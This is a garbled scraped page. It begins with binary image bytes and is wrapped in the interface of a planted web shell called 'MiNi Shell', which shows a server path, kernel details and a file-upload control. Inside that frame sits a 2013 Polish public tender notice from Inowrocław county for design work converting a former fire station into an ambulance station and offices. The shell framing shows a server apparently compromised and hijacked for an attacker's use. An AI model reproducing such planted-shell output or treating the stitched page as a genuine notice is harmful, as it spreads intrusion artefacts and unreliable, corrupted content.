JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130118/27210-N-2013.html

<p class="kh_header"><b>Inowrocław: Wykonanie dokumentacji projektowej dla adaptacji budynku po Straży Pożarnej przy ul. Poznańskiej 133 A w Inowrocławiu na Pogotowie Ratunkowe i pomieszczenia biurowe.</b><br>
<b>Numer ogłoszenia: 27210 - 2013; data zamieszczenia: 18.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Inowrocławski , ul. Roosevelta 36/38, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3592100, faks 052 3574820.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej dla adaptacji budynku po Straży Pożarnej przy ul. Poznańskiej 133 A w Inowrocławiu na Pogotowie Ratunkowe i pomieszczenia biurowe..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis ogólny przedmiotu zamówienia.
Przedmiotem  zamówienia jest  zaprojektowanie przebudowy budynku po Straży Pożarnej przy ul. Poznańskiej 133 A w Inowrocławiu na Pogotowie Ratunkowe 
i pomieszczenia biurowe. 
a) wykonanie projektu budowlanego przebudowy istniejącego budynku po Straży  Pożarnej, na Pogotowie Ratunkowe i pomieszczenia biurowe dla Starostwa Powiatowego oraz pomieszczenia  Obrony  Cywilnej, wraz z niezbędnymi rozbiórkami, 
b) wykonanie projektu zagospodarowania terenu w granicach uzgodnionych 
z inwestorem.
c) sporządzenie projektów wykonawczych, a także specyfikacji technicznych wykonania  i odbioru robót budowlanych, przedmiarów budowlano - instalacyjnych i kosztorysów  inwestorskich. 
Wykaz opracowań wchodzących w skład przedmiotu zamówienia:
a) projekt budowlany w 5 egz.,
b) projekt wykonawczy w 5 egz., 
c) specyfikacja techniczna wykonania i odbioru robót w 3 egz.,
d) kosztorys inwestorski w 1 egz.,
e) przedmiar robót w 3 egz.,
f) przedmiot umowy należy wykonać także w wersji elektronicznej - 1 egz. format pdf. na płycie CD.
Przedmiot zamówienia obejmuje ponadto:
a) wykonanie audytu energetycznego, zgodnie z treścią Rozporządzenia Ministra Infrastruktury z dnia 17 marca 2009 r. (Dz. U. z 2009 r. Nr 43, poz. 346) w 3 egz.,
b) przygotowanie opinii ornitologicznej zgodnie z obowiązującymi przepisami w 3 egz.  

Zamawiający przewiduje realizację inwestycji w etapach:
- wymiana pokrycia dachu z dociepleniem oraz wymiana stolarki okiennej i drzwiowej zewnętrznej,
- częściowa rozbiórka wieży wraz z adaptacją na klatkę schodową oraz elewacja budynku z dociepleniem,
- przebudowa pomieszczeń na potrzeby Pogotowia Ratunkowego, pomieszczenia biurowe.
W związku z powyższym przedmiary robót i kosztorysy inwestorskie muszą uwzględniać etapowanie robót. 
Charakterystyczne parametry określające wielkość obiektu: 
- długość                            - 47,50 m
- szerokość                         - 24,70 m
- wysokość budynku          -  7,50 m
- wysokość wieży              - 22,70 m
 powierzchnia  zabudowy
- budynek    -  890,37 m2
- portiernia   -   23,78 m2
- wieża         -   28,73 m2
 ---------------------------------
 razem                942,88 m2
powierzchnia użytkowa  - 1806,31 m2
kubatura                         
- budynek       -  8568,20m3
- portiernia    -   57,07 m3
- wieża          - 652,17 m3
 ---------------------------------
 razem              9277,26 m3         
     
Istniejący budynek po Straży Pożarnej znajduje się na działce oznaczonej literami A, B, C, D na kopii mapy w skali 1: 500 (działka nr 18/7 mapa 782 obręb VII  
w Inowrocławiu). Powierzchnia działki  wynosi 2624,00 m2. 
Dla pracowników i pacjentów należy zapewnić miejsca postojowe.
Powierzchnia biologicznie czynna powinna wynosić minimum 10% powierzchni   działki . 
Aktualne  uwarunkowania  wykonania  przedmiotu  zamówienia.
Urbanistyczno-budowlane warunki zabudowy i zagospodarowania terenu określa Miejscowy Plan Zagospodarowania Przestrzennego uchwałą nr XII/178/2007 Rady Miejskiej Inowrocław z dnia 22 listopada 2007 r. (Dz. Urz. Woj. Kuj. - Pom. z dnia 21 lipca 2008 r. nr 96 poz.1538).
Opis stanu istniejącego.
Działka, na której znajduje się obiekt będący przedmiotem opracowania jest działką narożną u zbiegu ulic Poznańskiej i Miechowickiej, ograniczających ją od strony południowej i zachodniej. Działka jest częścią większego terenu, na którym zlokalizowany jest nowy budynek Straży  Pożarnej, i z którego nie ma wygrodzenia.
Działka ma niezależny wjazd od ulicy Poznańskiej oraz wjazd od ulicy Miechowickiej.  Teren działki jest płaski, utwardzony nawierzchnią asfaltową z wyjątkiem fragmentu na narożniku południowo - zachodnim oraz przy szczycie wschodnim, gdzie występuje nawierzchnia trawiasta z pojedynczymi  drzewami iglastymi i krzewami. 
Uzbrojenie działki stanowią przyłącza: wodociągowe, kanalizacji sanitarnej 
i deszczowej, centralnego ogrzewania i elektryczne. 
Budynek zaprojektowany w 1956 roku, a zrealizowany w roku 1960 na potrzeby Straży Pożarnej jest obiektem 2-kondygnacyjnym z pełnym podpiwniczeniem, z dachem  płaskim, o rzucie w kształcie litery L. 
Dominantę wysokościową stanowi przybudowana do wschodniego szczytu wieża wspinalni. Do szczytu północnego został przybudowany parterowy budynek portierni. Wejście główne znajduje się od ulicy Poznańskiej, przed wejściem jest urządzony parking dla samochodów osobowych.
W budynku znajdują się 2 klatki schodowe nie spełniające wymogów dla obiektów użyteczności publicznej.
Budynek  posiada  następujące instalacje:
-  wodno-kanalizacyjną,
-  elektryczną,
-  centralnego  ogrzewania,
-  wentylacji mechanicznej. 
Szczegółowe dane dotyczące konstrukcji obiektu znajdują się w ekspertyzie technicznej.    
Ogólne  właściwości  funkcjonalno-użytkowe.            
Budynek Działu Pomocy Doraźnej ma pełnić funkcje pomocy medycznej stacjonarnej i wyjazdowej dla mieszkańców miasta Inowrocław i powiatu inowrocławskiego. Świadczenia medyczne będą  obejmować wstępną diagnostykę w zakresie ogólnym dla dorosłych i dzieci i drobne zabiegi w systemie stacjonarnym i wyjazdowym.
Budynek ma pełnić również  funkcję bazy wyjazdowej i zaplecza socjalnego dla ekip medyczne.
Pomieszczenia, które pozostaną wolne po spełnieniu podstawowych funkcji obiektu mają pozostawać w użytkowaniu Starostwa  Powiatowego jako biura i archiwa.  W celu   spełniania funkcji  podstawowych budynek musi być wyposażony dodatkowo w zespół pomieszczeń technicznych oraz pomieszczenia umożliwiające prawidłową logistykę.
Wymagania zamawiającego w stosunku do przedmiotu  zamówienia.
Rozwiązanie nowej funkcji obiektu powinno umożliwić bezkolizyjne użytkowanie   budynku przez dwóch różnych użytkowników. 
Dział Pomocy Doraźnej ze względu na charakter działalności powinien być zlokalizowany na parterze i mieć dwa wejścia: jedno dla pacjentów przybywających samodzielnie oraz personelu i interesantów od  strony ul. Poznańskiej, drugie dla ekip wyjazdowych od ul. Miechowickiej.  W sąsiedztwie wejścia dla pacjentów powinien być zlokalizowany parking z wjazdem od ul. Poznańskiej.  
Część biurowa, której użytkownikiem będzie Starostwo Powiatowe winna mieć niezależne wejście nie kolidujące z ruchem pacjentów i ekip wyjazdowych .
Dopuszcza się wykonanie szatni w pomieszczeniach piwnicznych po uzyskaniu  odstępstwa od obowiązujących w tym zakresie przepisów od Państwowego Wojewódzkiego Inspektora Sanitarnego . 
Budynek nie  powinien mieć barier  architektonicznych.      
Zakres prac projektowych.          
Wykonawca opracuje projekt budowlany planowanego zamierzenia inwestycyjnego w następujących branżach :
- zagospodarowanie  terenu,
- architektura,
- konstrukcja, 
- technologia  medyczna,
- instalacje sanitarne (instalacja wod-kan., instalacja grzewcza, wentylacja mechaniczna i klimatyzacja),
- instalacje  elektryczne,
- instalacje  teletechniczne,
- projekt organizacji ruchu,
- informacja o Bezpieczeństwie i Ochronie Zdrowia.
Dla stacji pogotowia należy wykonać antenę radiostacji i połączenie światłowodowe ze szpitalem.   
Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z zasadami współczesnej wiedzy technicznej i obowiązującymi w tym zakresie przepisami - m.in. Prawem budowlanym, Rozporządzeniem Ministra Infrastruktury z dnia 2 września  2004r. w sprawie szczególnego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 ze zm.), Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U. Nr 130, poz. 1389), Rozporządzeniem Ministra   Infrastruktury z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego i uzyska przewidziane przepisami uzgodnienia.
Ponadto do obowiązków projektanta będzie należało wykonanie badań geotechnicznych gruntu.
Inwestor dostarczy aktualny podkład sytuacyjno-wysokościowy w skali 1: 500 do celów projektowych.
Przygotowana dokumentacja, musi spełniać wymogi do przeprowadzenia postępowania 
w sprawie udzielenia zamówienia publicznego na podstawie przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm).  
Zamawiający zakazuje wprowadzania klauzul do dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych, które wskazywałyby znaki towarowe, patenty lub pochodzenie, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub nie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy (lub równoważne).
Inwentaryzacja obiektu, ekspertyza techniczna i dokumenty formalno - prawne stanowią załączniki do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia/nie spełnia.
Warunek zostanie uznany za spełniony jeżeli Wykonawca udokumentuje wykonanie minimum dwóch prac projektowych obiektów użyteczności publicznej obejmujących co najmniej branże: ogólnobudowlaną, sanitarną i elektryczną.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia/nie spełnia.
Warunek zostanie uznany za spełniony jeżeli Wykonawca udokumentuje dysponowanie osobami posiadających uprawnienia budowlane do projektowania bez ograniczeń co najmniej w specjalności: konstrukcyjno-budowlanej, sanitarnej i elektrycznej oraz przedłoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej:
- zmiana obowiązującej stawki VAT - wyłącznie w przypadku i w terminie wejścia w życie ustawowej zmiany stawki podatku VAT. Zmiana ceny związana z ustawową zmianą wysokości VAT może obejmować wyłącznie zakres robót określonych w specyfikacji i ofercie, a jeszcze nie wykonanych.
Powyższe postanowienie stanowią wykaz zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią zobowiązania do wyrażenia takiej zgody. Strona występująca z propozycją zmiany umowy, w oparciu o przedstawiony powyżej wykaz możliwych zmian umowy, zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego pok. 106 ul. Mątewska 17, 88-100 Inowrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 10:00, miejsce: W siedzibie Zamawiającego, pokój nr: 144 ul. Prezydenta Franklina Roosevelta 36-38, 88-100 Inowrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com